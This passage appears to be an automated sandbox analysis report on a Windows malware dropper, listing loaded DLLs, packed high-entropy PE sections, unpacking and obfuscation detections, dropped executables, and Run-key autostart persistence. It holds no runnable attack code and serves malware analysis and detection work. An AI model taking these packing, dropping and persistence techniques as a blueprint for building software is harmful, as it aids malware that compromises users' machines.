Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.35.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.35.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.35.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.35.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.35.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.35.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 2fQ8fpTWAP.exe Static file information: File size 1887744 > 1048576
Source: 2fQ8fpTWAP.exe Static PE information: Raw size of bwkbkxir is bigger than: 0x100000 < 0x19b200
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: f20b4c0961.exe, 0000000B.00000003.2685648261.0000000007D60000.00000004.00001000.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000002.2784603033.0000000005BF2000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Unpacked PE file: 0.2.2fQ8fpTWAP.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bwkbkxir:EW;pbwruhnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bwkbkxir:EW;pbwruhnr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bwkbkxir:EW;pbwruhnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bwkbkxir:EW;pbwruhnr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bwkbkxir:EW;pbwruhnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bwkbkxir:EW;pbwruhnr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Unpacked PE file: 10.2.e2af9f55fd.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;chbioofn:EW;gsyzfhio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;chbioofn:EW;gsyzfhio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Unpacked PE file: 11.2.f20b4c0961.exe.8d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwjcifzz:EW;olfigpve:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwjcifzz:EW;olfigpve:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Unpacked PE file: 28.2.e2af9f55fd.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;chbioofn:EW;gsyzfhio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;chbioofn:EW;gsyzfhio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Unpacked PE file: 30.2.44452951d3.exe.290000.0.unpack :EW;.rsrc:W;.idata :W;rqyixswb:EW;aovkkqgk:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Unpacked PE file: 38.2.e2af9f55fd.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;chbioofn:EW;gsyzfhio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;chbioofn:EW;gsyzfhio:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: f20b4c0961.exe.7.dr Static PE information: real checksum: 0x1d0a27 should be: 0x1d2205
Source: 2fQ8fpTWAP.exe Static PE information: real checksum: 0x1d9d51 should be: 0x1d5e65
Source: random[1].exe.7.dr Static PE information: real checksum: 0x1d0a27 should be: 0x1d2205
Source: 44452951d3.exe.7.dr Static PE information: real checksum: 0x2b7ddb should be: 0x2bc6bc
Source: random[1].exe0.7.dr Static PE information: real checksum: 0x1c25f6 should be: 0x1bfeaa
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1d9d51 should be: 0x1d5e65
Source: e2af9f55fd.exe.7.dr Static PE information: real checksum: 0x1c25f6 should be: 0x1bfeaa
Source: random[2].exe.7.dr Static PE information: real checksum: 0x2b7ddb should be: 0x2bc6bc
PE file contains sections with non-standard names
Source: 2fQ8fpTWAP.exe Static PE information: section name:
Source: 2fQ8fpTWAP.exe Static PE information: section name: .idata
Source: 2fQ8fpTWAP.exe Static PE information: section name:
Source: 2fQ8fpTWAP.exe Static PE information: section name: bwkbkxir
Source: 2fQ8fpTWAP.exe Static PE information: section name: pbwruhnr
Source: 2fQ8fpTWAP.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: bwkbkxir
Source: skotes.exe.0.dr Static PE information: section name: pbwruhnr
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: xwjcifzz
Source: random[1].exe.7.dr Static PE information: section name: olfigpve
Source: random[1].exe.7.dr Static PE information: section name: .taggant
Source: f20b4c0961.exe.7.dr Static PE information: section name:
Source: f20b4c0961.exe.7.dr Static PE information: section name: .idata
Source: f20b4c0961.exe.7.dr Static PE information: section name:
Source: f20b4c0961.exe.7.dr Static PE information: section name: xwjcifzz
Source: f20b4c0961.exe.7.dr Static PE information: section name: olfigpve
Source: f20b4c0961.exe.7.dr Static PE information: section name: .taggant
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: chbioofn
Source: random[1].exe0.7.dr Static PE information: section name: gsyzfhio
Source: random[1].exe0.7.dr Static PE information: section name: .taggant
Source: e2af9f55fd.exe.7.dr Static PE information: section name:
Source: e2af9f55fd.exe.7.dr Static PE information: section name: .idata
Source: e2af9f55fd.exe.7.dr Static PE information: section name:
Source: e2af9f55fd.exe.7.dr Static PE information: section name: chbioofn
Source: e2af9f55fd.exe.7.dr Static PE information: section name: gsyzfhio
Source: e2af9f55fd.exe.7.dr Static PE information: section name: .taggant
Source: random[2].exe.7.dr Static PE information: section name:
Source: random[2].exe.7.dr Static PE information: section name: .idata
Source: random[2].exe.7.dr Static PE information: section name: rqyixswb
Source: random[2].exe.7.dr Static PE information: section name: aovkkqgk
Source: random[2].exe.7.dr Static PE information: section name: .taggant
Source: 44452951d3.exe.7.dr Static PE information: section name:
Source: 44452951d3.exe.7.dr Static PE information: section name: .idata
Source: 44452951d3.exe.7.dr Static PE information: section name: rqyixswb
Source: 44452951d3.exe.7.dr Static PE information: section name: aovkkqgk
Source: 44452951d3.exe.7.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0118CB58 push esp; retf 9_3_0118CB59
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0118CB54 push esp; retf 9_3_0118CB55
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119996A push ebx; iretd 9_3_011999A1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119996A push ebx; iretd 9_3_011999A1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119996A push ebx; iretd 9_3_011999A1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119996A push ebx; iretd 9_3_011999A1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0118CB60 pushad ; retf 9_3_0118CB61
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0118CE60 push eax; iretd 9_3_0118CE61
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0118CB64 pushad ; retf 9_3_0118CB65
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119BA65 push es; retf 9_3_0119BB09
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119BA65 push es; retf 9_3_0119BB09
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119BA65 push es; retf 9_3_0119BB09
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119BA65 push es; retf 9_3_0119BB09
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0118CB9C pushfd ; retf 9_3_0118CB9D
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B991 push ebx; retf 9_3_0119B9A1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B991 push ebx; retf 9_3_0119B9A1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B991 push ebx; retf 9_3_0119B9A1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B991 push ebx; retf 9_3_0119B9A1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B988 push esi; retf 9_3_0119B989
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B988 push esi; retf 9_3_0119B989
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B988 push esi; retf 9_3_0119B989
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B988 push esi; retf 9_3_0119B989
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B3B4 push 200119C3h; ret 9_3_0119B3BD
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B3B4 push 200119C3h; ret 9_3_0119B3BD
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B3B4 push 200119C3h; ret 9_3_0119B3BD
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B3B4 push 200119C3h; ret 9_3_0119B3BD
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0118CBA0 pushfd ; retf 9_3_0118CBA1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B9A2 push eax; retf 9_3_0119B9B9
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B9A2 push eax; retf 9_3_0119B9B9
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B9A2 push eax; retf 9_3_0119B9B9
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119B9A2 push eax; retf 9_3_0119B9B9
Source: 2fQ8fpTWAP.exe Static PE information: section name: entropy: 7.978435904623713
Source: 2fQ8fpTWAP.exe Static PE information: section name: bwkbkxir entropy: 7.954110214651045
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.978435904623713
Source: skotes.exe.0.dr Static PE information: section name: bwkbkxir entropy: 7.954110214651045
Source: random[1].exe.7.dr Static PE information: section name: entropy: 7.977987189441114
Source: random[1].exe.7.dr Static PE information: section name: xwjcifzz entropy: 7.954800437299881
Source: f20b4c0961.exe.7.dr Static PE information: section name: entropy: 7.977987189441114
Source: f20b4c0961.exe.7.dr Static PE information: section name: xwjcifzz entropy: 7.954800437299881
Source: random[1].exe0.7.dr Static PE information: section name: chbioofn entropy: 7.953525251128387
Source: e2af9f55fd.exe.7.dr Static PE information: section name: chbioofn entropy: 7.953525251128387
Source: random[2].exe.7.dr Static PE information: section name: entropy: 7.773088013575787
Source: 44452951d3.exe.7.dr Static PE information: section name: entropy: 7.773088013575787
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Jump to dropped file
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f20b4c0961.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d146970153.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 44452951d3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e2af9f55fd.exe Jump to behavior
